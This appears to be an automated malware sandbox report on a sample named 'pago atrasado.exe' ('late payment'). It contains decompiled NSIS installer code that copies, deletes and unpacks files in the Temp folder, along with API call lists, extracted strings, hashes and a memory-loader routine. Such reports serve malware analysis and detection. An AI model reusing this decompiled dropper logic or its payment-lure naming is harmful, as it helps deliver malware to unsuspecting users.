											_t128 = 0x1a;
											do {
												_t87 =  *0x423f50; // 0x661638
												E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)(_t87 + 0x120)));
												DeleteFileA(0x41f0f0);
												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
													_t91 = CopyFileA("C:\\Users\\alfons\\Desktop\\pago atrasado.exe", 0x41f0f0, 1);
													_t149 = _t91;
													if(_t91 != 0) {
														_push(0);
														_push(0x41f0f0);
														E004058E6(_t149);
														_t93 =  *0x423f50; // 0x661638
														E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)(_t93 + 0x124)));
														_t95 = E004053F8(0x41f0f0);
														if(_t95 != 0) {
															CloseHandle(_t95);
															 *((intOrPtr*)(_t129 + 0x10)) = 0;
														}
													}
												}
												 *0x425400 =  *0x425400 + 1;
												_t128 = _t128 - 1;
												_t151 = _t128;
											} while (_t128 != 0);
											_push(0);
											_push(_t116);
											E004058E6(_t151);
										}
										goto L37;
									}
									 *_t123 = 0;
									_t124 =  &(_t123[4]);
									if(E0040576C(_t140,  &(_t123[4])) == 0) {
										goto L37;
									}
									E00405B98("C:\\Users\\alfons\\AppData\\Local\\Temp", _t124);
									E00405B98("C:\\Users\\alfons\\AppData\\Local\\Temp", _t124);
									 *((intOrPtr*)(_t129 + 0x10)) = 0;
									goto L36;
								}
								GetWindowsDirectoryA(_t116, 0x3fb);
								lstrcatA(_t116, "\\Temp");
								_t107 = E004030CA(_t135);
								_t136 = _t107;
								if(_t107 == 0) {
									goto L37;
								}
								goto L27;
							} else {
								goto L20;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L10;
				}
				goto L25;
				L4:
				E00405EBA(_t118); // executed
				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
				if( *_t118 != 0) {
					goto L4;
				} else {
					E00405F28(0xd);
					_t47 = E00405F28(0xb);
					 *0x423f44 = _t47;
					__imp__#17();
					__imp__OleInitialize(0); // executed
					 *0x423ff8 = _t47;
					SHGetFileInfoA(0x41f4f0, 0, _t129 + 0x38, 0x160, 0); // executed
					E00405B98("cuflzcqvvfgho Setup", "NSIS Error");
					_t51 = GetCommandLineA();
					_t125 = "\"C:\\Users\\alfons\\Desktop\\pago atrasado.exe\" ";
					E00405B98(_t125, _t51);
					 *0x423f40 = GetModuleHandleA(0);
					_t54 = _t125;
					if("\"C:\\Users\\alfons\\Desktop\\pago atrasado.exe\" " == 0x22) {
						 *((char*)(_t129 + 0x14)) = 0x22;
						_t54 =  &M0042A001;
					}
					_t56 = CharNextA(E004056B6(_t54,  *((intOrPtr*)(_t129 + 0x14))));
					 *(_t129 + 0x20) = _t56;
					goto L22;
				}
			}


































                                            0x0040310c
                                            0x00403110
                                            0x00403118
                                            0x0040311c
                                            0x00403121
                                            0x00403131
                                            0x00403134
                                            0x0040313b
                                            0x00403142
                                            0x00403142
                                            0x0040313b
                                            0x00403144
                                            0x00403144
                                            0x0040325a
                                            0x0040325a
                                            0x0040325a
                                            0x0040325c
                                            0x0040325e
                                            0x00000000
                                            0x00000000
                                            0x004031f3
                                            0x004031f6
                                            0x004031fe
                                            0x004031fe
                                            0x00403201
                                            0x00403206
                                            0x00403208
                                            0x00403208
                                            0x00403209
                                            0x00403209
                                            0x0040320e
                                            0x00403211
                                            0x0040324a
                                            0x0040324f
                                            0x00403254
                                            0x00403257
                                            0x00403259
                                            0x00403259
                                            0x00403259
                                            0x00000000
                                            0x00403213
                                            0x00403213
                                            0x00403214
                                            0x00403217
                                            0x0040321f
                                            0x00403222
                                            0x00403224
                                            0x00403224
                                            0x00403224
                                            0x00403224
                                            0x00403222
                                            0x00403229
                                            0x0040322f
                                            0x00403237
                                            0x0040323a
                                            0x0040323c
                                            0x0040323c
                                            0x0040323c
                                            0x0040323c
                                            0x0040323a
                                            0x00403241
                                            0x00403248
                                            0x00403262
                                            0x00403265
                                            0x00403265
                                            0x0040326e
                                            0x00403273
                                            0x00403273
                                            0x0040327e
                                            0x00403284
                                            0x00403289
                                            0x0040328b
                                            0x004032b1
                                            0x004032b6
                                            0x004032c0
                                            0x004032c7
                                            0x004032cb
                                            0x00403332
                                            0x00403332
                                            0x00403337
                                            0x0040333d
                                            0x00403341
                                            0x00403456
                                            0x0040345c
                                            0x004034f9
                                            0x004034f9
                                            0x004034fe
                                            0x00403501
                                            0x00403503
                                            0x00403503
                                            0x0040350b
                                            0x0040350b
                                            0x0040346b
                                            0x00403474
                                            0x00403476
                                            0x0040347b
                                            0x0040347d
                                            0x0040347f
                                            0x00403481
                                            0x00403483
                                            0x00403485
                                            0x00403487
                                            0x00403497
                                            0x00403499
                                            0x0040349b
                                            0x004034a8
                                            0x004034b7
                                            0x004034bf
                                            0x004034c7
                                            0x004034c7
                                            0x0040349b
                                            0x00403487
                                            0x00403483
                                            0x004034cb
                                            0x004034d0
                                            0x004034d7
                                            0x004034e5
                                            0x004034e8
                                            0x004034ee
                                            0x004034f0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004034d9
                                            0x004034df
                                            0x004034e1
                                            0x004034e3
                                            0x004034f2
                                            0x004034f4
                                            0x00000000
                                            0x004034f4
                                            0x00000000
                                            0x004034e3
                                            0x004034d7
                                            0x00403350
                                            0x00403357
                                            0x00403357
                                            0x004032cd
                                            0x004032d3
                                            0x00403322
                                            0x00403322
                                            0x0040332e
                                            0x00000000
                                            0x0040332e
                                            0x004032dc
                                            0x004032e9
                                            0x004032e0
                                            0x004032e6
                                            0x00000000
                                            0x00000000
                                            0x004032e8
                                            0x004032e8
                                            0x004032e8
                                            0x004032ed
                                            0x004032ef
                                            0x004032f7
                                            0x00403368
                                            0x0040336a
                                            0x00403371
                                            0x00403379
                                            0x00403379
                                            0x00403384
                                            0x00403389
                                            0x00403398
                                            0x0040339c
                                            0x0040339d
                                            0x004033a6
                                            0x0040339f
                                            0x0040339f
                                            0x0040339f
                                            0x004033ac
                                            0x004033b2
                                            0x004033b8
                                            0x004033c0
                                            0x004033c0
                                            0x004033ce
                                            0x004033d5
                                            0x004033de
                                            0x004033e4
                                            0x004033e4
                                            0x004033f0
                                            0x004033f6
                                            0x00403400
                                            0x0040340a
                                            0x00403410
                                            0x00403412
                                            0x00403414
                                            0x00403415
                                            0x00403416
                                            0x0040341b
                                            0x00403427
                                            0x0040342d
                                            0x00403434
                                            0x00403437
                                            0x0040343d
                                            0x0040343d
                                            0x00403434
                                            0x00403412
                                            0x00403441
                                            0x00403447
                                            0x00403447
                                            0x00403447
                                            0x0040344a
                                            0x0040344b
                                            0x0040344c
                                            0x0040344c
                                            0x00000000
                                            0x00403398
                                            0x004032f9
                                            0x004032fb
                                            0x00403306
                                            0x00000000
                                            0x00000000
                                            0x0040330e
                                            0x00403319
                                            0x0040331e
                                            0x00000000
                                            0x0040331e
                                            0x00403293
                                            0x0040329f
                                            0x004032a4
                                            0x004032a9
                                            0x004032ab
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403248
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004031f8
                                            0x004031f8
                                            0x004031f8
                                            0x004031f9
                                            0x004031f9
                                            0x00000000
                                            0x004031f8
                                            0x00000000
                                            0x00403149
                                            0x0040314a
                                            0x00403156
                                            0x0040315c
                                            0x00000000
                                            0x0040315e
                                            0x00403160
                                            0x00403167
                                            0x0040316c
                                            0x00403171
                                            0x00403178
                                            0x0040317e
                                            0x00403194
                                            0x004031a4
                                            0x004031a9
                                            0x004031af
                                            0x004031b6
                                            0x004031c9
                                            0x004031ce
                                            0x004031d0
                                            0x004031d2
                                            0x004031d7
                                            0x004031d7
                                            0x004031e7
                                            0x004031ed
                                            0x00000000
                                            0x004031ed

                                            APIs
                                            • SetErrorMode.KERNEL32 ref: 00403121
                                            • GetVersion.KERNEL32 ref: 00403127
                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403150
                                            • #17.COMCTL32(0000000B,0000000D), ref: 00403171
                                            • OleInitialize.OLE32(00000000), ref: 00403178
                                            • SHGetFileInfoA.SHELL32(0041F4F0,00000000,?,00000160,00000000), ref: 00403194
                                            • GetCommandLineA.KERNEL32(cuflzcqvvfgho Setup,NSIS Error), ref: 004031A9
                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\pago atrasado.exe" ,00000000), ref: 004031BC
                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\pago atrasado.exe" ,00409168), ref: 004031E7
                                            • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040327E
                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403293
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040329F
                                            • DeleteFileA.KERNEL32(1033), ref: 004032B6
                                              • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                              • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                            • OleUninitialize.OLE32(00000020), ref: 00403337
                                            • ExitProcess.KERNEL32 ref: 00403357
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\pago atrasado.exe" ,00000000,00000020), ref: 0040336A
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\pago atrasado.exe" ,00000000,00000020), ref: 00403379
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\pago atrasado.exe" ,00000000,00000020), ref: 00403384
                                            • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\pago atrasado.exe" ,00000000,00000020), ref: 00403390
                                            • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033AC
                                            • DeleteFileA.KERNEL32(0041F0F0,0041F0F0,?,00425000,?), ref: 004033F6
                                            • CopyFileA.KERNEL32(C:\Users\user\Desktop\pago atrasado.exe,0041F0F0,00000001), ref: 0040340A
                                            • CloseHandle.KERNEL32(00000000,0041F0F0,0041F0F0,?,0041F0F0,00000000), ref: 00403437
                                            • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 00403490
                                            • ExitWindowsEx.USER32 ref: 004034E8
                                            • ExitProcess.KERNEL32 ref: 0040350B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                            • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\pago atrasado.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\pago atrasado.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$cuflzcqvvfgho Setup$~nsu
                                            • API String ID: 3469842172-2681257831
                                            • Opcode ID: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                                            • Instruction ID: 90ec7ab760c3480979c70ff1213755fd4c015a14bcf9795d8db5e914811e335b
                                            • Opcode Fuzzy Hash: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                                            • Instruction Fuzzy Hash: E5A10470A083016BE7216F619C4AB2B7EACEB0170AF40457FF544B61D2C77CAA458B6F
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004054BD, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E004054BD(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040576C(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423fc8 =  *0x423fc8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405B98(0x421540, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004056D2(_t72);
					} else {
						lstrcatA(0x421540, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x421540,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004056B6( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B98(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E00405850(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E84(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423fc8 =  *0x423fc8 + 1;
										} else {
											E00404E84(0xfffffff1, _t72);
											E004058E6(__eflags, _t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004054BD(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x421540 - 0x5c;
					if( *0x421540 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405E93(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E0040568B(_t72);
							E00405850(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E84(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E84(0xfffffff1, _t72);
							return E004058E6(__eflags, _t72, 0);
						}
						L33:
						 *0x423fc8 =  *0x423fc8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                            0x004054c8
                                            0x004054cc
                                            0x004054d5
                                            0x004054d8
                                            0x004054db
                                            0x004054e3
                                            0x004054e5
                                            0x004054e6
                                            0x00000000
                                            0x004054e6
                                            0x004054f5
                                            0x004054f5
                                            0x004054f8
                                            0x004054fb
                                            0x0040550f
                                            0x00405516
                                            0x0040551b
                                            0x0040551d
                                            0x0040552d
                                            0x0040551f
                                            0x00405525
                                            0x00405525
                                            0x00405532
                                            0x00405535
                                            0x00405540
                                            0x00405546
                                            0x0040554b
                                            0x0040555b
                                            0x0040555d
                                            0x00405563
                                            0x00405566
                                            0x00405569
                                            0x00405626
                                            0x00405626
                                            0x0040562a
                                            0x0040562c
                                            0x0040562c
                                            0x0040562c
                                            0x0040562c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040556f
                                            0x0040556f
                                            0x00405578
                                            0x0040557e
                                            0x00405583
                                            0x00405586
                                            0x00405588
                                            0x0040558c
                                            0x0040558e
                                            0x0040558e
                                            0x0040558c
                                            0x00405591
                                            0x00405594
                                            0x004055a7
                                            0x004055a9
                                            0x004055ae
                                            0x004055b5
                                            0x004055cd
                                            0x004055d3
                                            0x004055d9
                                            0x004055db
                                            0x00405600
                                            0x004055dd
                                            0x004055dd
                                            0x004055e1
                                            0x004055f5
                                            0x004055e3
                                            0x004055e6
                                            0x004055ee
                                            0x004055ee
                                            0x004055e1
                                            0x004055b7
                                            0x004055bd
                                            0x004055bf
                                            0x004055c5
                                            0x004055c5
                                            0x004055bf
                                            0x00000000
                                            0x004055b5
                                            0x00405596
                                            0x00405599
                                            0x0040559b
                                            0x00000000
                                            0x00000000
                                            0x0040559d
                                            0x0040559f
                                            0x00000000
                                            0x00000000
                                            0x004055a1
                                            0x004055a5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405605
                                            0x0040560f
                                            0x00405615
                                            0x00405615
                                            0x00405620
                                            0x00000000
                                            0x00405620
                                            0x00405537
                                            0x0040553e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004054fd
                                            0x004054fd
                                            0x004054ff
                                            0x00405630
                                            0x00405633
                                            0x00405636
                                            0x00405688
                                            0x00405688
                                            0x00405688
                                            0x00405638
                                            0x0040563b
                                            0x00405646
                                            0x0040564b
                                            0x0040564d
                                            0x00000000
                                            0x00000000
                                            0x00405650
                                            0x00405656
                                            0x0040565c
                                            0x00405662
                                            0x00405664
                                            0x00000000
                                            0x00405680
                                            0x00405666
                                            0x0040566a
                                            0x00000000
                                            0x00000000
                                            0x0040566f
                                            0x00000000
                                            0x00405676
                                            0x0040563d
                                            0x0040563d
                                            0x00000000
                                            0x0040563d
                                            0x00405505
                                            0x00405509
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405509

                                            APIs
                                            • DeleteFileA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004054DB
                                            • lstrcatA.KERNEL32(00421540,\*.*,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405525
                                            • lstrcatA.KERNEL32(?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405546
                                            • lstrlenA.KERNEL32(?,?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040554C
                                            • FindFirstFileA.KERNEL32(00421540,?,?,?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040555D
                                            • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040560F
                                            • FindClose.KERNEL32(?), ref: 00405620
                                            Strings
                                            • \*.*, xrefs: 0040551F
                                            • "C:\Users\user\Desktop\pago atrasado.exe" , xrefs: 004054BD
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004054C7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: "C:\Users\user\Desktop\pago atrasado.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                            • API String ID: 2035342205-2095690587
                                            • Opcode ID: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                                            • Instruction ID: 6fea787f5ff7f663b03802bfccf250d7b0f6b6b9ddff8139893414afbc0e0c0d
                                            • Opcode Fuzzy Hash: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                                            • Instruction Fuzzy Hash: D851CE30804A447ACB216B218C49BBF3B78DF92728F54857BF809751D2E73D5982DE5E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 1001A402, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1001A4DC
                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 1001A506
                                            • ReadFile.KERNEL32(00000000,00000000,1001A248,?,00000000), ref: 1001A51D
                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 1001A53F
                                            • FindCloseChangeNotification.KERNEL32(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,1001A19C,7FDFFF66), ref: 1001A5B2
                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 1001A5BD
                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,1001A19C), ref: 1001A608
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                            • String ID:
                                            • API String ID: 656311269-0
                                            • Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                            • Instruction ID: 08dd0d8a1b5c369709eae3767430104e5388ea3a98c6ad7ed95ce82a3af55b79
                                            • Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                            • Instruction Fuzzy Hash: 1F616175E04714ABCB10CFB4C884BAEB7F6EF49650F108059E905EB395E674EE818B54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004061D4, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E004061D4() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
